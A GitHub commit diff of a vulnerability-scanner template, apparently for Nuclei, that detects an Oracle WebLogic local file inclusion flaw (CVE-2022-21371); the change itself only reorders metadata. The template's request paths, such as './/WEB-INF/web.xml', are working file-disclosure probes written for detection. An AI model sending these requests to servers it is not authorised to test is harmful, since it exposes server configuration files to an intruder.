Update CVE-2022-21371.yaml

patch-1
Prince Chaddha 2022-01-25 21:06:14 +05:30 committed by GitHub
parent 2460dceff3
commit 97b38b98b4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 5 deletions

View File

@ -2,23 +2,22 @@ id: CVE-2022-21371
info:
name: Oracle WebLogic Server LFI
author: Paradessia and Narluin
author: paradessia,narluin
severity: high
description: Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion
tags: cve,cve2022,lfi,weblogic,oracle
reference:
- https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786
- https://nvd.nist.gov/vuln/detail/CVE-2022-21371
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21371
- https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2022-21371
tags: cve,cve2022,lfi,weblogic,oracle
requests:
- method: GET
path:
- "{{BaseURL}}.//META-INF/MANIFEST.MF"
- "{{BaseURL}}.//WEB-INF/web.xml"
- "{{BaseURL}}.//WEB-INF/portlet.xml"
- "{{BaseURL}}.//WEB-INF/weblogic.xml"
@ -27,10 +26,10 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<web-app"
- "</web-app>"
part: body
condition: and
- type: status